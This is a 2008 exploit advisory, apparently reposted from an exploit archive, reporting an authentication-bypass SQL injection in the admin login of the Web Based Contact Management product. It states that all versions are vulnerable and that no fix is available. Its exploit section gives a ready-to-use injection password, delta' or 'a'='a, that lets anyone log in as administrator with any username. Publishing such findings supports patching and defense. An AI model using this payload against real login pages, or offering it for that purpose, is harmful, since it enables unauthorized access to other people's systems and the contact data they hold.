Rae Media Contact MS (Auth Bypass) SQL Injection Vulnerability

2008-12-03 19:09:20

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


APA Center of Yazd University
(https://www.ircert.cc)


AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 03 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: [email protected]

#####################################################

APPLICATION : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR : http://www.aliensoftcorp.com/
DEMO : http://www.aliensoftcorp.com/contactmanager.htm

#####################################################


[+] vuln :

Admin login page

All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.

All Demo links are here:

http://www.aliensoftcorp.com/contactmanager.htm

[+] Exploit :
USER: anything

PASS: delta' or 'a'='a


##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.